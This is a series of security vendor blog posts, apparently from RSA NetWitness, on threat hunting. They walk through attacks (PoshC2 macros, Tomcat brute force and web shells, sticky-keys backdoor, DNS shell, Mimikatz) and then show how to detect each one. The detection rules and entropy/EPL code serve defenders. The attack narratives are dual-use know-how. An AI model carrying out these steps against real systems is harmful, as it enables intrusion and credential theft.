It is also important to note that PowerShell Empire network traffic is cumbersome to decrypt. It is therefore important to have an endpoint solution, such as NetWitness Endpoint, that tracks the activities performed on the endpoint for you.

 

Further Work

Rui Ataide has been working on a script to scrape Censys.io data looking for instances of PowerShell Empire. The attached Python script queries the Censys.io API looking for specific body request hashes, then subsequently gathers information surrounding the C2, including:

 

  • Hosting Server Information
  • The PS1 Script
  • C2 Information

 

Also attached is a sample output from this script with the PowerShell Empire metadata that has currently been collected.

Understanding how attackers may gain a foothold on your network is an important part of being an analyst. If attackers want to get into your environment, they typically will find a way. It is up to you to detect and respond to these threats as effectively and efficiently as possible. This blog post will demonstrate how a host became infected with PoshC2, and subsequently how the C&C (Command and Control) communication looks from the perspective of the defender.

 

The Attack

The attacker crafts a malicious Microsoft Word Document that contains a macro with their payload. This document is sent to an individual from the organisation they want to attack, in the hopes the user will open the document and subsequently execute the macro within. The Word document attempts to trick the user into enabling macros by containing content like the below:

 

The user enables the content and doesn't see any additional content, but in the background, the malicious macro executed and the computer is now part of the PoshC2 framework:

 

From here, the attacker can start to execute commands, such as tasklist, to view all currently running processes:

 

The attacker may also choose to setup persistence by creating a local service:

 

Preamble to Hunting

Prior to performing threat hunting, the analyst needs to assume a compromise, and generate a hypothesis as to what s/he is looking for. In this case, the analyst is going to focus on hunting for C2 traffic over HTTP. Now that the analyst has decided upon the hypothesis, this will dictate where they will look for that traffic, and what meta keys are of use to them to achieve the desired result. Refining the analysts approach toward threat hunting, will heed far greater results in detection, if the analysts have a path to walk down, and can exhaust all possible avenues of that path, before taking another route, the data set will be thoroughly sifted through in a more methodological manner, as there will be less distractions for the analyst.

 

The Detection Using Packet Data

Understanding how HTTP works, is vital in detecting malicious C2 over HTTP. To become familiar with this, analysts should analyse HTTP traffic generated by malware, and HTTP traffic generated by users, this allows the analyst to quickly determine what is out of place in a data set vs. what seems to be normal. This is a common strategy among malware authors, they want to blend in with regular network communications and appear as innocuous as possible, but by their very nature, Trojans are programmatic and structured, and when examined, it becomes clear the communications hold no business value.

 

Taking the information above into account, the analyst begins their investigation by focusing on the protocol of interest at this point in time, HTTP. This one simply query, quickly removes a large amount of the data set, and allows the analyst to place an analytical lens on just the protocol of interest. This is not to say that the analyst will not look at other protocols, but at this point in time, and for this hunt, their focus is on HTTP:

 

Now the data set has been significantly reduced, but that reduction needs to continue. A great way of reducing the data set to interesting sessions is to use the Service Analysis meta key. This meta key contains metadata that pulls apart the protocol, and details information about that session, that can help the analyst distinguish between user behavior, and automated malicious behavior. The analyst opens the meta key, and focuses on a few characteristics of the HTTP session that s/he thinks make the traffic more likely to be of interest:

 

Let's delve into these a little, and find out why s/he picked them:

 

  • http no referer: An interactive session from a typical user browsing the web, would mean the HTTP request should contain a referrer header, with the address of where that user came from. More mechanical type HTTP traffic, typically will not have a referrer header.
  • http four or less headers: Typical HTTP requests from users browsing the web, have seven or more HTTP headers, therefore, looking for sessions that have a lower HTTP header count, could yield more mechanical type HTTP requests.
  • http single request/response: A single TCP session can be used for multiple HTTP transactions. Therefore, if a typical user is browsing the web, you would expect to see multiple GET's and potentially POST's within a single session. Therefore placing a focus on HTTP sessions that only have a single request and response, could lead us to more mechanical type behavior.

 

There are a variety of other drills that could have been performed by the analyst, but for now, this will be sufficient for the path they want to take as they have reduced the data set to a more manageable amount. The analyst while perusing the other available metadata, observes an IP communicating directly to another IP, with requests for a diverse range of resources:

 

Opening the visualization to analyse the cadence of the communication, the analyst observes there to be some beaconing type behavior:

 

 

Reducing the time frame down, the beaconing is easier to see and appears to be ~every 5 minutes:

 

Upon opening the Event Analysis view, the analyst can see the beacon pattern, which is happening roughly every 5 minutes, the analyst also observes there to be a low variance in the payload size; this is indicative of some mechanical check-in type behavior, which is exactly what the analyst was looking for:

 

Now the analyst has found some interesting sessions, they can reconstruct the RAW payload, to see if there are further anomalies of interest. Browsing through the sessions, the analyst see's that the requests do not return any data, and are to random sounding resources. This seems like some sort of check-in type behavior:

 

The analyst comes back to the events view to see if there are any larger sessions toward to this IP, to get a better sense if any data is being sent back and forth. The analyst notices a few sessions that are larger than the others and decides to investigate those sessions:

 

Reconstructing one of the larger sessions, the analyst can see a large chunk of base64 is being returned:

 

As well as POST's with suspicious base64 encoded cookies header that does not conform to the RFC:

 

This seems to be the only type of data transferred between the two IP's and stands out as very suspicious, This should alert the analyst, that this is most likely some form of C2 activity:

 

The base64 is encrypted, and therefore the analyst cannot decode and find out the information being transferred. 

 

THOUGHT: Maybe there is another way for us to get the key to decode this? Keep reading on!

 

The analyst has now found some suspicious activity, the next stage is to track this activity and see if it is happening elsewhere. This can easily be done by using an application rule, the analyst identifies somewhat unique criteria to this traffic using the investigation view, and converts that into an application rule, the following example would pick up on this activity and make it far easier for the analyst to track:

 

(service = 80) && (server = 'microsoft-httpapi/2.0') && (filename !exists) && (http.response = 'cachecontrol') && (resp.uniq = 'no-cache, no-store, must-revalidate') && query length 14-16

 

IMPORTANT NOTE: Before adding this application rule to the environment, it is important to note that the analyst thoroughly checked how many hits this logic would create in their environment before deploying. Application rules can work well in one environment, but can be very noisy in others.

 

It is also important to note that this application rule was generated specific to this environment and the traffic that was seen, not all PoshC2 traffic would look this way. It is up to the analyst to create application rules that suit their environment. It is also important to note that the http.response and resp.uniq meta keys need to be enabled in the http_lua_options file as they are not enabled by default.

 

The analyst creates the application rule, and pushes this to all available Decoders:

 

Upon doing so, the analyst see's the application creating metadata as expected, but also notices that there is another C2, and also another host infected in their network by PoshC2:

 

This demonstrates the necessity for tracking activity on your network as and when it is found, it can uncover new endpoints infected and allows you to track that activity easily.

 

From here, the analyst from this point has multiple routes that they could take:

 

  • Perform OSINT (Open Source Intelligence) on the IP/activity in question; or
  • Investigate if there is a business need for this communication; or
  • Investigate the endpoint to see what is making the communication, and if there are any other suspicious indicators.

 

The Detection Using Endpoint Tracking

The analyst, while performing their daily activity of perusing IOC's (Indicators of Compromise), BOC's (Behaviors of Compromise), and EOC's (Enables of Compromise) - observes an BOC that stands out of interest to them, office application runs powershell:

 

Opening the Event Analysis view for this BOC, the analyst can better understand what document the user opened for this activity to happen. There are three events for this, because the user opened the document three times, probably as they weren't seeing any data from the document after enabling the macros within the document:

 

Opening the session itself, the analyst can see the whole raw payload of the PowerShell that was invoked from the Word document:

 

Running this through base64 decoding, the analyst can see that it is double base64 encoded, and the PowerShell has also been deflated, meaning more obfuscation was put in place:

 

Decoding the second set of base64 and inflating, the actual PowerShell that was executed can now be seen:

 

Perusing the PowerShell, the analyst observes that there is a decode function within. This function requires an IV and KEY to successfully decrypt. This could be useful to decrypt the information that we saw in the packet data: 

 

The analyst calculates the IV from the key, which according to the PowerShell, is the key itself, minus 15 bytes from the beginning of said key, we then convert this to hex for ease of use:

 

Now the analyst has the key and the IV, they can decrypt the information they previously saw in the packets. The analyst navigates back to the packets and finds a session that contains some base64:

 

Using the newly identified information retrieved via the endpoint tracking, the analyst can now start to decode the information and see exactly what commands and data was sent to the C2:

 

Some of which can be incredibly beneficial, such as the below, which lists all the URL's this C2 will use:

 

The analyst also wants to find out if any other interesting activity was taking place on the endpoint, upon perusing the BOC meta key, the analyst spots the metadata, creates suspicious service running command shell:

 

The analyst opens the sessions in the Event Analysis view, and can see that PowerShell was spawning sc.exe to create a suspicious looking service called, CPUpdater:

 

This is the persistence mechanism that was chosen by the attacker. The analyst now has the full PowerShell command and base64 decode it, to confirm the assumptions:

 

 

 

Conclusion

Understanding the nuances between user based behavior and mechanical behavior, gives an advantage to the analyst who is performing threat hunting. If the analyst understands what "normal" should look like within their environment, they can easily discern it from abnormal behaviors.

 

It is also important to note the advantages of having endpoint tracking data with this scenario as well. Without the endpoint tracking data, the original document with the malicious PowerShell may not have been recoverable, and therefore the decryption of the information between the C2 and the endpoint, would not have been possible; both tools heavily compliment one another in creating the full analytical picture.

Attackers are continuously evolving in order to evade detection.  A popular method often utilized is encoding. An attacker may choose to, for example, encode their malicious binaries in order to evade detection; attackers can use a diverse range of techniques to achieve this, but in this post, we are focusing on an example of a hex encoded executable. The executable chosen for this example was not malicious, but a legitimate signed Microsoft binary.

 

This method of evading detection was observed in the wild by the RSA Incident Response team. Due to the close relationship between the Incident Response Team and RSA's Content Team, a request for this content was submitted by IR, and was published to RSA Live yesterday. The following post demonstrates the Incident Response team testing the newly developed content.

 

The Microsoft binary was converted to hexadecimal and uploaded onto Pastebin, which is an example of what attackers are often seen doing:  

 

A simple PowerShell script was written to download and decode the hexadecimal encoded executable and save it to the Temp directory:

 

Typically, the above PowerShell would be Base64 encoded and the IR team would normally see something like the below:

 

After executing the PowerShell script. It is possible to see the dllhost.exe was successfully decoded and saved into Temp directory:

 

Upon perusing the packet metadata, the analyst would be able to easily spot the download of this hex encoded executable by looking under the Indicator of Compromise key:

 

Conclusion

It is important to always keep the RSA NetWitness platform up to date with the latest content. RSA Live allows analysts to subscribe to content, as well as receive updates on when newly developed content is available. For more information on setting up RSA Live, please see: Live: Create Live Account 

This blog post is a follow on from the following two blog posts:

 

 

 

The Attack

The attacker is not happy with executing commands via the Web Shell, so she decides to upload a new Web Shell called, reGeorg (https://sensepost.com/discover/tools/reGeorg/). This Web Shell allows the attacker to tunnel other protocols over HTTP, therefore allowing the attacker to RDP for example, directly onto the Web Server, even though RDP isn’t directly allowed from the internet.

 

The attacker can upload the Web Shell via one of the previously utilized Web Shells:

 

The attacker can now check the upload was successful by navigating to the uploaded JSP page. If all is okay, the Web Shell return the message shown in the below screenshot:

 

The attacker can now connect to the reGeorg Web Shell:

 

This means the attacker now has remote access to anything accessible from the Web Server where the Web Shell is located. This means the attacker could choose to RDP to a previously identified machine for example:

 

Attackers also like to keep other access methods to endpoints, one way of doing this is to setup an accessibility backdoor. This involves the attacker altering a registry key to load CMD when another application executes, in this case sethc.exe – this is an accessibility feature you typically see when pressing the SHIFT key five times. This now means that anyone who can RDP to that machine, can receive a system level command prompt with no credentials required; this is because sethc.exe can be invoked at the login screen by pressing the SHIFT key five times, and with the registry key altered, will spawn CMD as well.

 

To set this up, the attacker can use the Web Shell, and perform this over WMI using REG ADD:

 

Now the attacker can RDP back to the host they just setup the accessibility backdoor on, press the SHIFT key five times to initiate sethc.exe, and will be given the command prompt as system without having to use credentials:

 

 

The Analysis in RSA NetWitness

The analyst, while perusing Behaviors of Compromise, observes some suspicious indicators, runs wmi command-line tool, creates remote process using wmi command-line tool, and http daemon runs command shell just to name a few:

 

Drilling into the WMI related metadata, it is possible to see the WMI lateral movement that was used to setup the accessibility backdoor from the Web Shell:

 

The analyst also observes some interesting hits under the Indicators of Compromise meta key, enables login bypass and configures image hijacking:

 

Drilling into these sessions, we can see it is related to the WMI lateral movement performed, but this event being from the endpoint the backdoor was setup on:

 

The analyst, further perusing the metadata, drills into the Behavior of Compromise metadata, gets current username, and can see the sticky key backdoor being used (represented by the sethc.exe 211) to execute whoami:

 

The analyst, also perusing HTTP network traffic, observed HTTP headers that they typically do not see, x-cmd, x-target, and x-port:

 

Drilling into the RAW sessions for these suspicious headers, it is possible to see the command sent to the Web Shell to initiate the RDP connection:

 

Further perusing the HTTP traffic toward tunnel.jsp, we can see the RDP traffic being tunnelled over HTTP requests. The reason this shows as HTTP and not RDP, is that the RDP traffic is being tunnelled over HTTP, there are therefore more characteristics which define this as HTTP, compared to RDP:

 

Conclusion

Attackers will leverage a diverse range of tools and techniques to ensure they keep access to the environment they are interested in. The tools and techniques used here are freely available online and are often seen utilized by advanced attackers; performing proactive threat hunting will ensure that these types of events do not go unnoticed within your environment.

Following up from the previous blog, Web Shells and RSA NetWitness, the attacker has since moved laterally. Using one of the previously uploaded Web Shells, the attacker confirms permissions by running, whoami, and checks the running processes using, tasklist. Attackers, like most individuals, are creatures of habit:

 

The attacker also executes a quser command to see if any users are currently logged in, and notices that an RDP session is currently active:

 

The attacker executes a netstat command to see where the RDP session has been initiated from and finds the associated connection:

 

The attacker pivots into his Kali Linux machine and sets up a DNS Shell. This DNS Shell will allow the attacker to setup C&C on the new machine she has just discovered:

 

The attacker moves laterally using WMI, and executes the encoded PowerShell command to setup the DNS C&C:

 

The DNS Shell is now setup and the attacker can begin to execute commands, such as whoami, on the new machine though the DNS Shell:

 

Subsequently, as the attacker likes to do, she also runs a tasklist through the DNS Shell:

 

Finally, the attacker confirms if the host has internet access by pinging, www.google.com:

 

As the attacker has confirmed internet access, she decides to the download Mimikatz using a PowerShell command:

 

The attacker then performs a dir command to check if Mimikatz was successfully downloaded:

 

From here, the attacker can dump credentials from this machine, and continue to move laterally around the organisation, as well as pull down new tools to achieve their task(s). The attacker has also setup a failover (DNS Shell) in case the Web Shells are discovered and subsequently removed.

 

 

 

Analysis

Since the previous post, the analyst has upgraded their system to NetWitness 11.3, and deployed the new agents to their endpoints. The tracking data now appears in the NetWitness UI, and subsequently the analysis will solely take place, on the 11.3 UI.

 

Tracking Data

The analyst, upon perusing the metadata, uncovers some reconnaissance commands being executed, whoami.exe and tasklist.exe on two of their endpoints:

 

Refocusing their investigation on those two endpoints, and exposing the Behaviours of Compromise (BOC) meta key, the analysts uncovers some suspect indicators that relate to a potential compromise, creates remote process using wmi command-line tool, http daemon runs command shell, runs powershell using encoded command, just to name a few:

 

Pivoting into the sessions related to, creates remote process using wmi command-line tool, the analyst observes the Tomcat Web Server performing WMI lateral movement on a remote machine:

 

The new 11.3 version stores the entire Encoded PowerShell command and performs no truncation:

 

This allows the analyst to perform Base64 decoding directly within the UI using the new Base64 decode function (NOTE: the squares in between each character are due to double byte encoding and not a byproduct of NetWitness decoding):

  

 

Navigating back to the metadata view, the analyst opens the Indicators of Compromise (IOC) meta key, and observed the metadata, drops credential dumping library:

 

Pivoting into those sessions, the analyst see’s that Mimikatz was dropped onto the machine that was previously involved in WMI the lateral movement:

 

Packet Data

The analyst also is looking into the packet data, they are searching through DNS as they had seen an increase in the amount of traffic that they typically see. Upon opening the SLD (Second Level Domain) meta key, the culprit of the increase is shown:

 

Focusing the search on the offending SLD, and expanding the Hostname Alias Record (alias.host) meta key, the analyst observed a large number of suspicious unique FQDN’s:

 

This is indicative behaviour of a DNS tunnel. Focusing on the DNS Response Text meta key, it is also possible to see the commands that were being executed:

 

We can further substantiate that this is a DNS Tunnel by using a tool such as CyberChef, and taking the characters after cmd in the FQDN, and hex decoding them, this reveals that data is being sent hex encoded as part of the FQDN itself, and sent as chunks, and reconstructed on the attacker side, due to the constriction on how much data can be sent via DNS:

 

 

ESA Rule

DNS based C&C is noisy, this is because there is only a finite amount of information that can be sent with each DNS packet. Therefore returning information from the infected endpoint requires a large amount of DNS traffic. Subsequently, the DNS requests that are made, need to be unique, so as not to be resolved by the local DNS cache or internal DNS servers. Due to this high level of noise from the DNS C&C communication, and the variance in the FQDN, it is possible to create an ESA rule that looks for DNS C&C with a high rate of fidelity.

The ESA rule attached to this blog post calculates a ratio of how many unique alias host values there are toward a single Second Level Domain (SLD). Whereby we count the number of sessions toward the SLD, and divide that by the number of unique alias hosts for that SLD, to give us a ratio:

 

  • SLD Session Count ÷ Unique Alias Host Count = ratio

 

The lower the ratio, the more likely this is to be a DNS tunnel; due to the high connection count, and variance in the FQDN to a single SLD. The below screenshot shows the output of this rule which triggered on the SLD which was shown in the analysis section of this blog post:

 

 

NOTE: Legitimate products perform DNS tunnelling, such as McAfee, ESET, TrendMicro, etc. These domains would need to be filtered out based on what you observe in your environment. The filtering option for domains is at the top of the ESA rule.

 

The rule for import and pure EPL code in a text file are attached to this blog. 

IMPORTANT: SLD needs to be set as an array for the to rule to work.

 

 

Conclusion

This blog post was to further demonstrate the TTP’s (Tools, Techniques, and Procedures) attackers may utilise in a compromise to achieve their end goal(s). It demonstrates the necessity for proactive threat hunting, as well as the necessity for both Packet and Endpoint visibility to succeed in said hunting. It also demonstrates that certain aspects of hunting can be automated, but only after fully understanding the attack itself; this is not to say that all threat hunting can be automated, a human element is always needed to confirm whether something is definitely malicious or not, but it can be used to minimise some of the work the analyst needs to do.

This blog also focused on the new 11.3 UI. This allows analysts to easily switch between packet data and endpoint data in a single pane of glass; increasing efficiency and detection capabilities of the analysts and the platform itself.

Introduction

This blog post demonstrates a common method as to how organisations can get compromised. Initially, the viewpoint will be from the attacker’s perspective, it will then move on to show what artifacts are left over within the RSA NetWitness Packets and RSA NetWitness Endpoint solutions that analysts could use to detect this type of activity.

 

Scenario

Apache Tomcat server exposed to the internet with weak credentials to the Tomcat Manager App gets exploited by an attacker. The attacker uploads three Web Shells, confirms access to all of them and then uploads Mimikatz to dump credentials.

 

Definitions

Web Shells

A web shell is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either internet-facing or internal to the network, where the web shell is used to pivot further to internal hosts.

A web shell can be written in any language that the target web server supports. The most commonly observed web shells are written in languages that are widely supported, such as JSP, PHP, ASP, Perl, Ruby, Python, and Unix shell scripts are also used.

 

Mimikatz

Mimikatz is an open source credential dumping program that is used to obtain account login and password information, normally in the form of a hash or a clear text password from an operating system.

 

THC Hydra

When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more.

 

WAR File

In software engineering, a WAR file (Web Application Resource[1] or Web application Archive[2]) is a file used to distribute a collection of JAR-files, JavaServer Pages, Java Servlets, Java classes, XML files, tag libraries, static web pages (HTML and related files) and other resources that together constitute a web application.


 

The Attack

The attacker finds an exposed Apache Tomcat Server for the organisation. This can be achieved in many ways, such as a simple Google search to show default configured Apache Servers:

                                      

The attacker browses to the associated Apache Tomcat server and see’s it is running up to date software and appears to be mainly left at default configuration:

                 

 

The attacker attempts to access the Manager App, the manager app requires a username and password and therefore the attacker cannot login to make changes. Typically, these servers are setup with weak credentials:

               

 

Based off of this assumption, the attacker uses an application called THC Hydra to brute force the Tomcat Manager App using a list of passwords. After a short while, Hydra returns a successful set of credentials:

                


The attacker can now login to the Manager App using the brute forced credentials:

               

 

From here, the attacker can upload a WAR (Web application ARchive) file which contains their Web Shells:

                

 

The WAR file is nothing more than just a ZIP file with the JSP Web Shells inside. In this case, three Web Shells were uploaded:

                  

 

After the upload, it is possible to see the new application called, admin (which is based off the WAR file name, admin.war), has been created:

              


The attacker has now successfully uploaded three Web Shells on to the server and can begin to use them. One of the Web Shells named, resetpassword.jsp, requires authentication to help protect direct access by other individuals; this page could also be adapted to confuse analysts when visited:

            

 

The attacker enters the password, and can begin browsing the web servers file system and executing commands, typical commands such as, whoami, are often used by attackers:

           

 

The attacker may also choose to see what processes are running to see if there are any applications that could hinder their progression by running, tasklist: 

           

 

From the previous command, the attacker notices a lack of Anti-Virus so decides to upload Mimikatz via the WebShell: 

          

 

The ZIP file has now been uploaded. This Web Shell also has an UnPack feature to decompress the ZIP file: 

         

 

Now the ZIP file is decompressed:

         

 

The attacker can now use the Shell OnLine functionality within this Web Shell which emulates CMD in order to navigate to the Mimi directory and see their uploaded tools: 

         

 

The attacker can then execute Mimikatz to dump all passwords in memory:

        

 

The attacker now has credentials from the Web Server:

         

 

The attacker could then use these credentials to laterally move onto other machines.

 

The attacker also dropped two other Web Shells, potentially as backups in case some get flagged. Let’s access those to see what they look like. This Web Shell is the JSP file called, error2.jsp, it has similar characteristics to the resetpassword.jsp Web Shell:

       

 

We can browse the file system and execute commands:

        

 

The final Web Shell uploaded, login.jsp, exhibits odd behavior when accessed:

       

 

It appears to perform a redirect to a default Tomcat Page named, examples, this appears to be a trick to confuse anyone who potentially browses to that JSP page. Examining the code for this Web Shell, it is possible to see it performs a redirect if the correct password is not supplied:

     

           <SNIP>

     

 

Passing the password to this Web Shell as a parameter, which is defined at the top of this Web Shell’s code, we get the default response from the Web Shell:

    

 

Further analyzing the code, you can understand further parameters to pass in order to make the Web Shell perform certain actions, such as a directory listing:

   

 

This Web Shell is known as Cknife, and interacting it in this way is not efficient or easy, so Cknife comes with a Java based client in order to control the Web Shell. We can launch this using the command shown below:

  

 

The client is then displayed which would typically be used:

  

Note:  This web shell is listed in this blog post as it is something the RSA Incident Response team consistently sees in some of the more advanced attacks.

 

The Analysis

Understanding the attack is important, and hence why it comes prior to the analysis section. Understanding how an attacker may operate, and the steps they may take to compromise a Web Server, will significantly increase your ability to detect these types of threats, as well as better understand the viewpoint of the analysis while triage is performed.

 

RSA NetWitness Packets

While perusing the network traffic, a large number of 401 authentication errors towards one the Web Servers was observed; there is also a large variety of what look like randomly generated passwords:

        

 

Focusing on the 401 errors, and browsing other metadata available, we can see the authentication errors are toward the Manager App of Tomcat over port 8080, also take note of the Client Application being used, this is the default from THC Hydra and has not been altered:

       

 

Removing the 401 errors, and opening the Filename and Directory meta keys, we can see the Web Shells that were being accessed and the tools that were uploaded:

       

 

NOTE: In an actual environment, a large number of directories and filenames would exist, it is up to the analyst to search for the filenames of interest that sound out of the norm or are in suspicious directories, are newly being accessed, and not accessed as frequently as other pages on the web server. For a more in-depth explanation to hunting using NetWitness Packets, take a look at the hunting guide available here: https://community.rsa.com/docs/DOC-79618

 

The analyst could also use other meta keys to look for suspicious/odd behavior. Inbound HTTP traffic with windows cli admin commands would be worth investigating, as well as sessions with only POST’s for POST based Web Shell’s, http post no get or http post no get no referer, for a couple of examples:

     

 

Investigating the sessions with windows cli admin commands yields the following two sessions, you’ll notice one of the sessions is one of the Web Shells, resetpassword.jsp

    

 

Double clicking on the session will reconstruct the packets and display the session in Best Reconstruction view, in this case, web. Here we can see the Web Shell as the browser would have rendered it, this instantly should stand out as something suspicious:

    

 

This HTTP session also contains the error2.jsp Web Shell, from the RSA NetWitness rendering, it is possible to see the returned results that the attacker saw. Again, this should stand out as suspicious:

    

 

Coming back to the investigate view, and this time drilling into the sessions for post no get no referer, we can see one of the other Web Shells, login.jsp:

   

 

Double clicking on one of these sessions shows the results from the Cknife Web Shell, login.jsp:

    

 

As this was not a nicely formatted web based Web Shell, the output is not as attractive, but this still stands out as suspicious traffic: why would a JSP page on a Web Server return a tasklist?

 

Sometimes changing the view can also help to see additional data. Changing the reconstruction to text view shows the HTTP POST sent, this is where you can see the tasklist being executed and the associated response:

   

 

Further perusing the network traffic, it is also possible to see that Mimikatz was executed:

  

This is an example of what the traffic may look like in RSA NetWitness Packets. The analyst would only need to pick up on one of these sessions to know their organization has been compromised. Pro-active threat hunting and looking for anomalies in traffic toward your web servers will significantly reduce the attacker dwell time.

 

The activity observed was only possible due to the communication happening over HTTP. If this had been SSL, the detection via packets would be much more difficult. This is why introducing SSL Decryption/Interception/Offloading is highly recommended. SSL inspection devices are nothing more than a well-designed man-in-the-middle attack that breaks the encryption into two separate encrypted streams. Therefore, they still provide an adequate level of protection to end-users while allowing security analysts and devices to properly monitor and alert when malicious or unwanted activity takes place, such as the web shells shown here. In summary, if you are responsible for protecting your organization’s assets, you should definitely consider the pros and cons of using this technology.

 

 

RSA NetWitness Endpoint

On a daily basis, analysts should be perusing the IIOC’s within NWE, paying particular attention to the Level 1 IIOC’s. Upon logging into NWE, we can see an interesting Level 1 IIOC has hit, HTTP Daemon Runs Command Shell. This IIOC is looking for a HTTP Daemon, such as Tomcat, spawning cmd.exe:

 

      

 

If we double click on the machine name in the Machines window, we can then navigate to the tracking data for this machine to see what actually happened. Here we can see that Tomcat9.exe is spawning cmd.exe and running commands such as whoami and tasklist, this is not normal functionality and should raise concern for the analyst. We can also see the Mimikatz execution and the associated command executed for that:

 

    

 

Another IIOC that would have led us to this behavior is, HTTP Daemon Creates Executable:

 

   

 

Again, coming back into the tracking data, we can see the Tomcat9.exe web daemon writing files. This would be note-worthy and something that should be investigated further, as web daemons can perform this activity normally. In this instance, the presence of Mimikatz is enough for us to determine this would be malicious activity:

  

 

The analyst also has the capability to request files from the endpoint currently under analysis by right-clicking on the machine name, selecting Forensics and then Request File(s):

 

The analyst can specify the files they want to collect for their analysis (NOTE: wildcards can be used for the filenames but not directories). In this case, the analyst wants to look into the Tomcat Access files, and requests that five of them be returned:

 

Once the files have been downloaded, the analyst can save them locally by navigating to the Download tab, right-clicking the files of interest and selecting Save Local Copy:

 

Perusing the access files, the analyst can also see a large number of 401 authentication errors to the Tomcat Web Server which would have been from the THC Hydra brute force:

 

And also evidence of the Web Shells themselves. Some of the commands the attacker executed can be seen in the GET requests, the data in the body of the POST's however, does not show in the log file, showing why it is important to have both Packets and Endpoint visibility to understand the interaction with the Web Shell:

 

Conclusion

Understanding the potential areas of compromise within your organisation vastly increases your chances of early detection. This post was designed to show one of those potential areas of importance for attackers, and how they may go about a compromise, while also showing how that attack may look as captured by the RSA NetWitness Platform. It is also important to understand the benefits behind proactively monitoring the RSA NetWitness products for malicious activity, simply awaiting for an alert is not enough to capture attacks in their early stages.

 

It is also important to for defenders to understand how these types of attacks look within their own environment, allowing them to better understand, and subsequently protect against them.

 

This is something our RSA Incident Response practice does on a daily basis.  If your organization needs help or your interested to learn more, please contact your account manager.  

 

As always, happy hunting!  

After reading through a few SANS resources, I came across some interesting topics regarding the detection of rare processes to help pin point malicious applications running on a host; from this, I decided to create an EPL rule to baseline processes on Windows hosts and alert if any processes deviated from the norm.

 

The principle behind this rule is to profile every Windows host in the estate and keep track of the processes which run on said hosts, should they diverge from the average they are declared as rare and an alert is generated for analysts to investigate; the rule is written in a way to learn what is normal within a specific environment and baseline accordingly.

 

 

Dependencies

The following meta keys need to be indexed for the below rule to work:-

 

  • event_computer
  • process

 

Other than that, deploy the rule and you're good to go!

 

The EPL Rule

@Name('Create Window')

CREATE WINDOW winProcess.win:time(31 days) (theDay int, event_computer string, process string, counter int);

 

@Name('Insert into Window')

on Event(process IS NOT NULL AND event_computer IS NOT NULL)

merge winProcess

WHERE Event.process = winProcess.process AND Event.event_computer = winProcess.event_computer AND current_timestamp.getDayOfWeek() = winProcess.theDay

when matched

then update set counter = counter + 1

when not matched then INSERT

SELECT current_timestamp.getDayOfWeek() as theDay, event_computer, process, 1 as counter;

 

 

@Name('Alert')

@RSAAlert

SELECT * FROM winProcess as original

WHERE counter <= 0.2* (

SELECT avg(counter) FROM winProcess as recent

WHERE original.theDay = recent.theDay and original.event_computer = recent.event_computer);

Lee Kirkpatrick

DGA Detection

Posted by Lee Kirkpatrick Employee Feb 1, 2017

In one of my previous posts (Shannon. Have you seen my Entropy?) I touched on using a custom Java entropy calculator within the ESA to calculate the entropy values for domains to assist with detecting Domain Generation Algorithms (DGA's); the post was more theory than practical so I decided to implement and test it in my lab so I could share the implementation with you all.

 

The basic principle behind this form of DGA detection is to calculate an entropy value for each domain seen and store this value in an ESA window. We can then use the values in the ESA window to calculate an average entropy for the domains seen within an environment, this subsequently allows an alert to be generated if any domains exceed the average entropy by 1.3x.

 

As an example, let's take the following four domains from the Alexa top 100 (this will be what we use as an example baseline, the rule attached to this post would actually monitor your network for what is normal):-

 

  • google.com
  • youtube.com
  • facebook.com
  • baidu.com

 

Running these each through the entropy calculator we receive the following values:-

 

DomainEntropy
google.com2.6464393446710157
youtube.com3.095795255000934
facebook.com3.0220552088742
baidu.com3.169925001442312
Average2.983553702497115

 

Using this average as our baseline, we can then say that anything that is greater than 1.3x (3.87861981324625) this average, let me know about it as this is a high entropy value.

 

Taking the following values from Zeus tracker and calculating their entropy values, we can see the results:-

 

DomainEntropyStatus
circleread-view.com.mocha2003.mochahost.com
3.952216429463629Alert
cynthialemos1225.ddns.net
3.952216429463629
Alert
moviepaidinfullsexy.kz
4.061482186720775Alert
039b1ee.netsolhost.com
3.754441845713345No alert

 

Example of the alert output below:-

 

 

Rule Logic

@Name('Learning Phase Variable')
//Change the learningPhaseMinutes variable to the number of minutes for the rule to learn
CREATE VARIABLE INTEGER learningPhaseMinutes = 1440;

 

@Name('Calculate Learning Phase')
on pattern[Every(timer:at(*, *, *, *, *))] set learningPhaseMinutes = learningPhaseMinutes - 1;

 

@Name('Create Entropy Window')
CREATE WINDOW aliasHostEntropy.win:length(999999).std:unique(entropy) (entropy double);

 

@Name('Insert entropy into Window')
INSERT INTO aliasHostEntropy
SELECT calcEntropy(alias_host) as entropy FROM Event(alias_host IS NOT NULL AND learningPhaseMinutes > 1);

 

@Name('Alert')
@RSAAlert
SELECT *, (SELECT avg(entropy) FROM aliasHostEntropy as Average), (SELECT calcEntropy(alias_host) FROM Event.win:length(1) as Entropy) FROM Event(learningPhaseMinutes <= 1 AND calcEntropy(alias_host) > 1.3* (SELECT avg(entropy) FROM aliasHostEntropy));

 

 

If you are interested in implementing this DGA Detection rule, I wrote up a little guide on how to do so. Everything you need is attached to this post.

 

DISCLAIMER: The information within this blog post is here to show the capabilities of the NetWitness product and avenues of exploration to help thwart the adversary. This content is provided as-is with no RSA direct support, use it at your own risk. Additionally, you should always confirm architecture state before running content that could impact the performance of your NetWitness architecture. 

Filter Blog

By date: By tag: